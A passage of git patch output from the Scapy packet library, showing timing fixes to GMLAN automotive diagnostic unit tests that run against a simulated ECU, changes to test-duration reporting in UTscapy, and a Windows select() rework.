as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert ecusimSuccessfullyExecuted == True ############ Address boundary checks +drain_bus(iface0) = Positive, highest possible address for scheme conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = b"\x76" isotpsock2.send(ack) @@ -463,12 +495,13 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = Negative, invalid address (too large for addressing scheme) +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = b"\x76" isotpsock2.send(ack) @@ -481,12 +514,13 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = Positive, address zero +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = b"\x76" isotpsock2.send(ack) @@ -499,12 +533,13 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = Negative, negative address +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = b"\x76" isotpsock2.send(ack) @@ -520,6 +555,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base + GMLAN_TransferPayload Tests ############################################ = Positive, short payload +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -533,12 +569,14 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = b"\x74" + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, dataRecord=payload) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = b"\x76" + time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) @@ -558,6 +596,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base keyfunc = lambda seed : seed - 0x1FBE = Positive scenario, level 1, tests if keyfunction applied properly +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -571,8 +610,10 @@ def ecusim(): ecusimSuccessfullyExecuted = False seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # wait for key + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) + time.sleep(0.1) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) @@ -591,6 +632,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert ecusimSuccessfullyExecuted == True = Positive scenario, level 3 +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -603,9 +645,11 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False seedmsg = GMLAN()/GMLAN_SAPR(subfunction=3, securitySeed=0xdead) + time.sleep(0.1) # wait for key requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=4, securityKey=0xbeef) + time.sleep(0.1) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) @@ -625,6 +669,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = Negative scenario, invalid password +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -638,8 +683,10 @@ def ecusim(): ecusimSuccessfullyExecuted = False seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # wait for key + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbabe) + time.sleep(0.1) if bytes(requ[0]) != bytes(pkt): nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) isotpsock2.send(nr) @@ -658,16 +705,19 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert ecusimSuccessfullyExecuted == True = invalid level (not an odd number) +drain_bus(iface0) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=2, timeout=1) == False = zero seed +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: # wait for request - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0x0000) + time.sleep(0.1) isotpsock2.send(seedmsg) thread = threading.Thread(target=ecusim) @@ -680,6 +730,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base ############### retry = Positive scenario, request timeout, retry works +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -689,9 +740,11 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=3) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # wait for key + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) pr = GMLAN()/GMLAN_SAPR(subfunction=2) + time.sleep(0.1) isotpsock2.send(pr) thread = threading.Thread(target=ecusim) @@ -703,6 +756,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = Positive scenario, keysend timeout, retry works +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -710,13 +764,17 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # timeout + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) # retry from start + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=3) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # wait for key + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pr = GMLAN()/GMLAN_SAPR(subfunction=2) + time.sleep(0.1) isotpsock2.send(pr) thread = threading.Thread(target=ecusim) @@ -729,19 +787,23 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = Positive scenario, request error, retry works +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: # wait for request requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x37) + time.sleep(0.1) # wait for request requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) + time.sleep(0.1) # wait for key requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) pr = GMLAN()/GMLAN_SAPR(subfunction=2) + time.sleep(0.1) isotpsock2.send(pr) thread = threading.Thread(target=ecusim) @@ -757,6 +819,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base + GMLAN_InitDiagnostics Tests ############################################################################## = sequence of the correct messages +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -769,18 +832,21 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = b"\x68" + time.sleep(0.1) # ReportProgrammedState requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN(b"\xa2") if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + time.sleep(0.1) # ProgrammingMode requestProgramming requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x1) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN(b"\xe5") + time.sleep(0.1) # InitiateProgramming enableProgramming requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x3) @@ -798,6 +864,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert ecusimSuccessfullyExecuted == True = sequence of the correct messages, disablenormalcommunication as broadcast +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -817,12 +884,14 @@ def ecusim(): ecusimSuccessfullyExecuted = False ack = GMLAN()/GMLAN_RPSPR(programmedState=0) print("ProgrammingMode requestProgramming") + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x1) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN(b"\xe5") print("InitiateProgramming enableProgramming") + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x3) if bytes(requ[0]) != bytes(pkt): @@ -841,6 +910,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base ######## timeout = timeout DisableNormalCommunication +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -864,6 +934,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = timeout ReportProgrammedState +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -876,12 +947,14 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = b"\x68" + time.sleep(0.1) # ReportProgrammedState requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN(b"\xa2") if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) @@ -896,6 +969,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = timeout ProgrammingMode requestProgramming +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -908,6 +982,7 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = b"\x68" + time.sleep(0.1) # ReportProgrammedState requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN(b"\xa2") @@ -915,6 +990,7 @@ def ecusim(): ecusimSuccessfullyExecuted = False ack = GMLAN()/GMLAN_RPSPR(programmedState=0) # ProgrammingMode requestProgramming + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x1) if bytes(requ[0]) != bytes(pkt): @@ -932,6 +1008,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base ###### negative respone = timeout DisableNormalCommunication +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -944,6 +1021,7 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) @@ -958,6 +1036,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base ###### retry tests = sequence of the correct messages, retry set +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -965,12 +1044,15 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = b"\x68" # ReportProgrammedState + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN()/GMLAN_RPSPR(programmedState=0) # ProgrammingMode requestProgramming + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN(b"\xe5") # InitiateProgramming enableProgramming + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) @@ -984,6 +1066,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = negative response, make sure no retries are made +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -992,6 +1075,7 @@ def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) if len(requ) != 0: ecusimSuccessfullyExecuted = False @@ -1008,21 +1092,26 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = first fail at DisableNormalCommunication, then sequence of the correct messages +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) # DisableNormalCommunication + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = b"\x68" # ReportProgrammedState + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN()/GMLAN_RPSPR(programmedState=0) # ProgrammingMode requestProgramming + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN(b"\xe5") # InitiateProgramming enableProgramming + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) @@ -1034,6 +1123,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = first fail at ReportProgrammedState, then sequence of the correct messages +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -1041,18 +1131,23 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = b"\x68" # Fail + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN() / GMLAN_NR(requestServiceId=0xA2, returnCode=0x12) # DisableNormalCommunication + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = b"\x68" # ReportProgrammedState + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN()/GMLAN_RPSPR(programmedState=0) # ProgrammingMode requestProgramming + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN(b"\xe5") # InitiateProgramming enableProgramming + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) @@ -1064,6 +1159,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = first fail at ProgrammingMode requestProgramming, then sequence of the correct messages +drain_bus(iface0) started = threading.Event() def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: @@ -1071,20 +1167,26 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = b"\x68" # ReportProgrammedState + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN()/GMLAN_RPSPR(programmedState=0) # Fail + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN() / GMLAN_NR(requestServiceId=0xA5, returnCode=0x12) # DisableNormalCommunication + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = b"\x68" # ReportProgrammedState + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN()/GMLAN_RPSPR(programmedState=0) # ProgrammingMode requestProgramming + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN(b"\xe5") + time.sleep(0.1) isotpsock2.send(ack) # InitiateProgramming enableProgramming requ = isotpsock2.sniff(count=1, timeout=1) @@ -1098,6 +1200,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = fail twice +drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): @@ -1106,8 +1209,10 @@ def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) if len(requ) != 0: ecusimSuccessfullyExecuted = False @@ -1125,6 +1230,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base + GMLAN_ReadMemoryByAddress Tests ############################################################################## = Positive, short length, scheme = 4 +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -1138,6 +1244,7 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN() / GMLAN_RMBAPR(memoryAddress=0x0, dataRecord=payload) + time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) @@ -1151,6 +1258,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base = Negative, negative response +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() @@ -1158,6 +1266,7 @@ def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = GMLAN() / GMLAN_NR(requestServiceId=0x23, returnCode=0x31) + time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) @@ -1169,11 +1278,13 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base assert res = Negative, timeout +drain_bus(iface0) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None ###### RETRY = Positive, negative response, retry succeeds +drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() @@ -1181,8 +1292,10 @@ def ecusim(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = GMLAN() / GMLAN_NR(requestServiceId=0x23, returnCode=0x31) + time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN() / GMLAN_RMBAPR(memoryAddress=0x0, dataRecord=payload) + time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) From 215fd09ea8891b7d080fa0b80b7fa0f99ddf3137 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 11 Mar 2021 14:19:13 +0100 Subject: [PATCH 0527/1632] Disable GMLAN tests --- test/contrib/automotive/gm/gmlan.uts | 2 ++ 1 file changed, 2 insertions(+) diff --git a/test/contrib/automotive/gm/gmlan.uts b/test/contrib/automotive/gm/gmlan.uts index 6aa503b8c7e..9a562bbb029 100644 --- a/test/contrib/automotive/gm/gmlan.uts +++ b/test/contrib/automotive/gm/gmlan.uts @@ -5,6 +5,8 @@ % gmlan unit tests +~ disabled + + Configuration of scapy = Load gmlan layer ~ conf From dea8a1d95353ae8040a164a2328dd23396fe8737 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 11 Mar 2021 22:51:07 +0100 Subject: [PATCH 0528/1632] Detect long tests UTscapy --- .github/workflows/unittests.yml | 2 +- scapy/tools/UTscapy.py | 20 ++++++++++++++++---- test/contrib/automotive/gm/gmlan.uts | 2 -- 3 files changed, 17 insertions(+), 7 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index f752bb92e0f..1fb0bf48c9b 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -58,7 +58,7 @@ jobs: utscapy: name: ${{ matrix.os }} ${{ matrix.python }} ${{ matrix.mode }} runs-on: ${{ matrix.os }} - timeout-minutes: 20 + timeout-minutes: 25 strategy: matrix: os: [ubuntu-latest] diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 115a161026c..18e0165990a 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -618,12 +618,24 @@ def drop(scapy_ses): # INFO LINES # -def info_line(test_campaign): +def info_line(test_campaign, theme): filename = test_campaign.filename + duration = test_campaign.duration + if duration > 10: + duration = theme.format(duration, "bg_red+white") + elif duration > 5: + duration = theme.format(duration, "red") if filename is None: - return "Run %s by UTscapy" % time.ctime() + return "Run at %s by UTscapy in %s" % ( + time.strftime("%H:%M:%S"), + duration + ) else: - return "Run %s from [%s] by UTscapy" % (time.ctime(), filename) + return "Run at %s from [%s] by UTscapy in %s" % ( + time.strftime("%H:%M:%S"), + filename, + duration + ) def html_info_line(test_campaign): @@ -641,7 +653,7 @@ def campaign_to_TEXT(test_campaign, theme): ftheme = [lambda x: x, theme.fail][bool(test_campaign.failed)] output = theme.green("\n%(title)s\n" % test_campaign) - output += dash + " " + info_line(test_campaign) + "\n" + output += dash + " " + info_line(test_campaign, theme) + "\n" output += ptheme(" " + arrow + " Passed=%(passed)i\n" % test_campaign) output += ftheme(" " + arrow + " Failed=%(failed)i\n" % test_campaign) output += "%(headcomments)s\n" % test_campaign diff --git a/test/contrib/automotive/gm/gmlan.uts b/test/contrib/automotive/gm/gmlan.uts index 9a562bbb029..6aa503b8c7e 100644 --- a/test/contrib/automotive/gm/gmlan.uts +++ b/test/contrib/automotive/gm/gmlan.uts @@ -5,8 +5,6 @@ % gmlan unit tests -~ disabled - + Configuration of scapy = Load gmlan layer ~ conf From 880d0487c6885a5ddd0c5f747f6a9e0461a35278 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Fri, 12 Mar 2021 19:04:44 +0100 Subject: [PATCH 0529/1632] Implement proper `select()` on Windows (#3090) * Implement a proper select.select() on windows * Apply p-l- suggestion --- scapy/arch/bpf/supersocket.py | 2 +- scapy/arch/common.py | 28 --- scapy/arch/libpcap.py | 29 +-- scapy/arch/windows/native.py | 9 +- scapy/automaton.py | 290 +++++++++----------------- scapy/contrib/cansocket_python_can.py | 2 +- scapy/contrib/isotp.py | 4 +- scapy/layers/can.py | 4 +- scapy/layers/usb.py | 2 +- scapy/pipetool.py | 77 ++----- scapy/sendrecv.py | 13 +- scapy/supersocket.py | 14 +- scapy/utils.py | 4 +- test/contrib/isotp.uts | 2 +- test/pipetool.uts | 10 +- test/scapy/automaton.uts | 6 +- test/tls/tests_tls_netaccess.uts | 3 +- test/windows.uts | 12 +- 18 files changed, 168 insertions(+), 343 deletions(-) diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index f92f1962d38..c1b72d495df 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -231,7 +231,7 @@ def select(sockets, remain=None): the available sockets. """ # sockets, None (means use the socket's recv() ) - return bpf_select(sockets, remain), None + return bpf_select(sockets, remain) class L2bpfListenSocket(_L2bpfSocket): diff --git a/scapy/arch/common.py b/scapy/arch/common.py index 79649687bae..958c59d0d87 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -10,7 +10,6 @@ import ctypes import socket import struct -import time from scapy.consts import WINDOWS from scapy.config import conf from scapy.data import MTU, ARPHDR_ETHER, ARPHRD_TO_DLT @@ -21,11 +20,8 @@ # Type imports import scapy from scapy.compat import ( - Callable, - List, Optional, Tuple, - TypeVar, Union, ) @@ -91,30 +87,6 @@ def get_if_raw_hwaddr(iff, # type: Union[NetworkInterface, str] get_if(iff, siocgifhwaddr) ) -# SOCKET UTILS - - -_T = TypeVar("_T") - - -def _select_nonblock(sockets, # type: List[_T] - remain=None # type: Optional[int] - ): - # type: (...) -> Tuple[List[_T], Callable[['scapy.supersocket.SuperSocket'], Optional['scapy.packet.Packet']]] # type: ignore # noqa: E501 - """This function is called during sendrecv() routine to select - the available sockets. - """ - # pcap sockets aren't selectable, so we return all of them - # and ask the selecting functions to use nonblock_recv instead of recv - def _sleep_nonblock_recv(self # type: 'scapy.supersocket.SuperSocket' - ): - # type: (...) -> 'Optional[scapy.packet.Packet]' - res = self.nonblock_recv() # type: ignore - if res is None: - time.sleep(conf.recv_poll_rate) - return res # type: ignore - # we enforce remain=None: don't wait. - return sockets, _sleep_nonblock_recv # BPF HANDLERS diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 807cfbde300..84abe9af8e7 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -13,8 +13,7 @@ import struct import time -from scapy.automaton import SelectableObject -from scapy.arch.common import _select_nonblock +from scapy.automaton import SelectableObject, select_objects from scapy.compat import raw, plain_str from scapy.config import conf from scapy.consts import WINDOWS @@ -62,15 +61,10 @@ class _L2libpcapSocket(SuperSocket, SelectableObject): - nonblocking_socket = True - def __init__(self): SelectableObject.__init__(self) self.cls = None - def check_recv(self): - return True - def recv_raw(self, x=MTU): """Receives a packet, then returns a tuple containing (cls, 